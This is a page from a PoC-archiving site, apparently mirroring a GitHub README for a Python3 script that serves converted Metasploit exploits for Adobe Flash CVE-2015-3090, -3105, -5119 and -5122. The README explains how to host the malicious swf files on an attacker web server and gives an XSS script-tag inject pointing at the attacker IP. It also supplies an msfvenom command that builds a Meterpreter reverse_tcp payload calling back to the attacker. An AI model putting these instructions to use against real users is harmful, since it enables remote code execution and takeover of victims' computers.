Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2015-3090 PoC — 多款Adobe产品缓冲区溢出漏洞

Source
https://github.com/Xattam1/Adobe-Flash-Exploits_17-18
Associated Vulnerability
Title:多款Adobe产品缓冲区溢出漏洞 (CVE-2015-3090)
Description:Adobe Flash Player、Adobe AIR SDK和Adobe AIR SDK & Compiler都是美国奥多比(Adobe)公司的产品。Adobe Flash Player是一款多媒体播放器产品;Adobe AIR SDK和Adobe AIR SDK & Compiler都是适用于Adobe AIR(一个跨操作系统的运行时环境)的标准开发工具包。 多款Adobe产品中存在安全漏洞。攻击者可利用该漏洞执行任意代码,或造成拒绝服务(内存损坏)。以下产品及版本受到影响:基于Windows和OS
Description
Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.
Readme
# Adobe Flash Exploits CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 Python3 Script
Converted Metasploit exploits for Adobe Flash vulnerabilities CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, and CVE-2015-5122 to a Python3 script.

## Information

This script will host a web server that can exploit one of the following Adobe Flash vulnerabilities at a time:

1. CVE-2015-3090
2. CVE-2015-3105
3. CVE-2015-5119
4. CVE-2015-5122

## Execute

You must make changes ([outlined here](#modifications)) to [exploit.py](exploit.py) to suit your needs.

### Modifications

- `hostname = "192.168.1.100"`
  - This is an IP on the attacking system that will host the exploit web server.
- `serverPort = 8080`
  - This is the port on the attacking system that will host the exploit web server.
- `xss = False`
  - If set to `True`, then the victim's first request to the server is treated as JavaScript:
    - Example XSS Inject:
      - `<script src="http://192.168.1.100:8080/"></script>`
    - Attack path:
      - Victim request 1 -> XSS vulnerable server:
        - Victim accesses XSS inject on a remote server that requests a JavaScript file (see request 2).
      - Victim request 2 -> JavaScript source on attacking system.
      - Victim request 3 -> Malicious swf file.
  - If set to `False`, then the victim's first request to the server is treated as HTML:
    - Example:
      - `http://192.168.1.100:8080/`
    - Attack path:
      - Victim request 1 -> HTML file on attacking system.
      - Victim request 2 -> Malicious swf file.
- `base64Payload = "..."`
  - This is the base64 payload that will be executed on the victim system.
  - Modify the example command below to suit your needs and generate your payload:
    - Example:
      - `msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64`
    - > Note: The only payload that has worked for me is `windows/meterpreter/reverse_tcp`.
- `swfFile = swfFileList['37368']`
  - Select the Adobe Flash exploit swf file to use for exploiting the victim system:
    - ```
      swfFileList = {
          '37368': 'CVE-2015-3090.swf',
          '37448': 'CVE-2015-3105.swf',
          '37523': 'CVE-2015-5119.swf',
          '37599': 'CVE-2015-5122.swf'
      }
      ```

### Run

Run the following command, in the same directory as the malicious swf files, to execute the Adobe Flash exploit script:

- `python3 exploit.py`

## References:

CVE-2015-3090 -> https://exploit-db.com/exploits/37368

CVE-2015-3105 -> https://exploit-db.com/exploits/37448

CVE-2015-5119 -> https://exploit-db.com/exploits/37523

CVE-2015-5122 -> https://exploit-db.com/exploits/37599
File Snapshot

 [4.0K]  /data/pocs/4fca3d48d2c532f23214406337b9dfc363674a62
├── [ 21K]  CVE-2015-3090.swf
├── [ 22K]  CVE-2015-3105.swf
├── [ 48K]  CVE-2015-5119.swf
├── [ 42K]  CVE-2015-5122.swf
├── [6.3K]  exploit.py
└── [2.6K]  README.md

0 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.